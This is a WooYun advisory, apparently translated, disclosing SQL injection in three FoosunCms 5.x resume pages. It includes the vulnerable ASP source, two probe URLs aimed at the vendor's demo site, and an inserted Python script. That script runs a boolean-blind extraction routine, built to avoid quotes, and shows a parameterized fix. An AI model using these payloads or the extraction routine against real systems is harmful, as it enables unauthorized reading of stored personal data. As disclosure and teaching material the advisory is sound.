
Vulnerability summary

Defect ID: wooyun-2014-078961

Title: Multiple SQL injections in the latest FoosunCms 5.x

Vendor: FoosunCms

Author: menmen519

Submitted: 2014-10-15 11:41

Fix time: 2015-01-13 11:42

Published: 2015-01-13 11:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-15: Vendor contacted and awaiting vendor acknowledgement; details not public
2015-01-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

Multiple SQL injections in the latest FoosunCms 5.x

Detailed description:

Straight to the code.
User/job/lib/AP_Resume_workcity.asp (lines 9-15):

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
' id is taken straight from the query string; NoSqlHack is the only filter applied to it
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
' the filtered-but-otherwise-raw id is handed to the "workcity" branch of getResumeInfo
if id<>"" then call resumeObj.getResumeInfo("workcity",id)
%>


This calls getResumeInfo, so let's follow it into cls_resume.asp:

Public function getResumeInfo(part,id)
Dim sqlstatement,resumeRs
Set resumeRs=Server.CreateObject(G_FS_RS)
select case NoSqlHack(part)
' most branches coerce id through CintStr() before concatenating it
case "baseinfo" sqlstatement="select BID,UserNumber,Uname,Sex,PictureExt,Birthday,CertificateClass,CertificateNo,CurrentWage,CurrencyType,WorkAge,Province,City,HomeTel,CompanyTel,Mobile,Email,QQ,isPublic,click,lastTime,address,ShenGao,XueLi,HowDay from FS_AP_Resume_BaseInfo where bid="&CintStr(id)
' the next three branches concatenate id as-is, with no CintStr(): injectable
case "intention" sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
case "position" sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
case "workcity" sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
case "workexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,CompanyName,CompanyKind,Trade,Job,Department,Description,Certifier,CertifierTel from FS_AP_Resume_WorkExp where bid="&CintStr(id)
case "educateexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,SchoolName,Specialty,Diploma,Description from FS_AP_Resume_EducateExp where bid="&CintStr(id)
case "trainexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,TrainOrgan,TrainAdress,TrainContent,Certificate from FS_AP_Resume_TrainExp where bid="&CintStr(id)
case "language" sqlstatement="select BID,UserNumber,Language,Degree from FS_AP_Resume_Language where bid="&CintStr(id)
case "certificate" sqlstatement="select BID,UserNumber,FetchDate,Certificate,Score from FS_AP_Resume_Certificate where bid="&CintStr(id)
case "projectexp" sqlstatement="select BID,UserNumber,BeginDate,EndDate,Project,SoftSettings,HardSettings,Tools,ProjectDescript,Duty from FS_AP_Resume_ProjectExp where bid="&CintStr(id)
case "other" sqlstatement="select BID,UserNumber,Title,Content from FS_AP_Resume_Other where bid="&CintStr(id)
case "mail" sqlstatement="select BID,UserNumber,MailName,Content from FS_AP_Resume_Mail where bid="&CintStr(id)
End select
' the statement is executed exactly as built above
resumeRs.open sqlstatement,Conn,1,3
if resumeRs.eof then exit function
if part="baseinfo" then
base_BID=resumeRs("BID")
base_UserNumber=resumeRs("UserNumber")
base_Uname=resumeRs("Uname")
base_Sex=resumeRs("Sex")
base_PictureExt=resumeRs("PictureExt")
base_Birthday=resumeRs("Birthday")
base_CertificateClass=resumeRs("CertificateClass")
base_CertificateNo=resumeRs("CertificateNo")
base_CurrentWage=resumeRs("CurrentWage")
base_CurrencyType=resumeRs("CurrencyType")
base_WorkAge=resumeRs("WorkAge")
base_Province=resumeRs("Province")
base_City=resumeRs("City")
base_HomeTel=resumeRs("HomeTel")
base_CompanyTel=resumeRs("CompanyTel")
base_Mobile=resumeRs("CompanyTel") ' as in the original source: reads CompanyTel, not Mobile
base_Email=resumeRs("Email")
base_QQ=resumeRs("QQ")
base_isPublic=resumeRs("isPublic")
base_click=resumeRs("click")
base_lastTime=resumeRs("lastTime")

base_address=resumeRs("address")
base_ShenGao=resumeRs("ShenGao")
base_XueLi=resumeRs("XueLi")
base_HowDay=resumeRs("HowDay")
Elseif part="intention" then
Itn_WorkType=resumeRs("WorkType")
Itn_Salary=resumeRs("Salary")
Itn_SelfAppraise=resumeRs("SelfAppraise")
Elseif part="position" then
pos_trade=resumeRs("trade")
pos_job=resumeRs("job")
Elseif part="workexp" then
wep_BeginDate=resumeRs("BeginDate")
wep_EndDate=resumeRs("EndDate")
wep_CompanyName=resumeRs("CompanyName")
wep_CompanyKind=resumeRs("CompanyKind")
wep_Trade=resumeRs("Trade")
wep_Job=resumeRs("job")
wep_Department=resumeRs("Department")
wep_workDescription=resumeRs("Description")
wep_Certifier=resumeRs("Certifier")
wep_CertifierTel=resumeRs("CertifierTel")
Elseif part="educateexp" then
edu_BeginDate=resumeRs("BeginDate")
edu_EndDate=resumeRs("EndDate")
edu_SchoolName=resumeRs("SchoolName")
edu_Specialty=resumeRs("Specialty")
edu_Diploma=resumeRs("Diploma")
edu_Description=resumeRs("Description")
Elseif part="trainexp" then
train_BeginDate=resumeRs("BeginDate")
train_EndDate=resumeRs("EndDate")
train_TrainOrgan=resumeRs("TrainOrgan")
train_TrainAdress=resumeRs("TrainAdress")
train_TrainContent=resumeRs("TrainContent")
train_Certificate=resumeRs("Certificate")
Elseif part="language" then
lng_Language=resumeRs("Language")
lng_Degree=resumeRs("Degree")
Elseif part="certificate" then
cer_FetchDate=resumeRs("FetchDate")
cer_Certificate=resumeRs("Certificate")
cer_Score=resumeRs("Score")
Elseif part="projectexp" Then
Pro_BeginDate=resumeRs("BeginDate")
Pro_EndDate=resumeRs("EndDate")
Pro_Project=resumeRs("Project")
Pro_SoftSettings=resumeRs("SoftSettings")
Pro_HardSettings=resumeRs("HardSettings")
Pro_Tools=resumeRs("Tools")
Pro_ProjectDescript=resumeRs("ProjectDescript")
Pro_Duty=resumeRs("Duty")
Elseif part="other" Then
o_title=resumeRs("title")
o_content=resumeRs("content")
Elseif part="mail" Then
mailTitle=resumeRs("MailName")
mailContent=resumeRs("Content")
End if
End function


Look at these three cases:
case "intention" sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
case "position" sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
case "workcity" sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
Unlike the other branches, which wrap id in CintStr(), these three concatenate id into the statement with no processing at all, and NoSqlHack evidently lets the payload below through.
Request directly:
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects)
The page loads normally. Now change one character so the injected subquery refers to a table that does not exist, and the database throws a SQL error:
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects1)

[Screenshot: 1.png]


That confirms the guess.
Now the second location:
User\Job\lib\AP_Resume_Position.asp:
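As an added illustration (not code from the report or from FoosunCms), the following Python models the unprotected "workcity" statement over an in-memory sqlite3 database standing in for the product's Access backend. It reproduces the error-based check above (sqlite_master plays the role of MSysAccessObjects), then goes one step further and shows the boolean-blind extraction the same oracle enables, next to a hardened variant that coerces id to an integer and binds it as a parameter. The table and column names are the report's; the sample rows, the helper names and the sqlite3 stand-in are constructed for this example.

```python
import sqlite3

TABLE = "FS_AP_Resume_WorkCity"  # name from the report; backend here is sqlite3, Access in the product


def make_db():
    """Constructed sample data: two resumes, nothing from a real deployment."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"create table {TABLE} (BID integer primary key, UserNumber text, Province text, City text)")
    conn.executemany(f"insert into {TABLE} values (?,?,?,?)",
                     [(1, "U001", "Guangdong", "Shenzhen"), (2, "U002", "Beijing", "Beijing")])
    return conn


def vulnerable_query(id_value):
    """Builds the statement the way the 'workcity' case does: raw concatenation, no CintStr()."""
    return f"select BID,UserNumber,Province,City from {TABLE} where bid=" + id_value


def run_vulnerable(conn, id_value):
    return conn.execute(vulnerable_query(id_value)).fetchall()


def probe(conn, id_value):
    """The report's check: a valid injected subquery runs, a non-existent table raises an error."""
    try:
        run_vulnerable(conn, id_value)
        return True
    except sqlite3.OperationalError:
        return False


def boolean_true(conn, condition):
    """Boolean-blind oracle: row 1 comes back only when the injected condition holds."""
    return len(run_vulnerable(conn, f"1 and ({condition})")) > 0


def blind_extract(conn, column, bid, max_len=16):
    """Recovers a column of row `bid` one character at a time using only boolean_true().
    Quotes are avoided by comparing code points (unicode()/substr() are sqlite3 built-ins;
    Jet SQL has Asc()/Mid()), so a filter that strips quotes alone would not stop this."""
    out = ""
    for pos in range(1, max_len + 1):
        for cp in range(32, 127):
            cond = f"(select unicode(substr({column},{pos},1)) from {TABLE} where bid={bid})={cp}"
            if boolean_true(conn, cond):
                out += chr(cp)
                break
        else:
            break  # no character matched: end of string
    return out


def run_hardened(conn, id_value):
    """Fix: treat id as an integer (what CintStr does for the other branches) and bind it."""
    bid = int(id_value)  # ValueError on anything that is not an integer literal
    return conn.execute(f"select BID,UserNumber,Province,City from {TABLE} where bid=?", (bid,)).fetchall()


def hardened_rejects(conn, id_value):
    """True when the hardened path refuses the input instead of running it."""
    try:
        run_hardened(conn, id_value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "1 and exists (select count(*) from sqlite_master)"))   # True: page loads
    print(probe(db, "1 and exists (select count(*) from sqlite_master1)"))  # False: SQL error
    print(blind_extract(db, "UserNumber", 2))
    print(hardened_rejects(db, "1 and exists (select count(*) from sqlite_master)"))
```

The error-vs-no-error difference on the two URLs above is all an attacker needs: once that oracle exists, blind_extract() turns it into a row-by-row, character-by-character read of any table the connection can see. The hardened path makes the integer coercion the query already relies on explicit, and the parameter binding means the value never reaches the SQL parser as text.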

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
' same pattern as AP_Resume_workcity.asp: id passes only through NoSqlHack
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
' "position" is one of the three branches that concatenate id without CintStr()
if id<>"" then call resumeObj.getResumeInfo("position",id)
%>



Third location:
FoosunCMS\User\Job\lib\AP_Resume_Intention.asp:

<%
Response.Charset="GB2312"
session("resumeStep")="baseinfo"
Dim resumeObj,id,Conn
MF_Default_Conn
' id again passes only through NoSqlHack
id=trim(NoSqlHack(request.QueryString("id")))
Set resumeObj=New cls_resume
' "intention" is the third branch that concatenates id without CintStr()
if id<>"" then call resumeObj.getResumeInfo("intention",id)
Conn.close
Set Conn=nothing
%>


OK.

Proof of vulnerability:

Suggested fix:

Copyright notice: please credit menmen519@WooYun when reposting


Vendor response

Vendor response:

Vendor could not be contacted, or vendor actively refused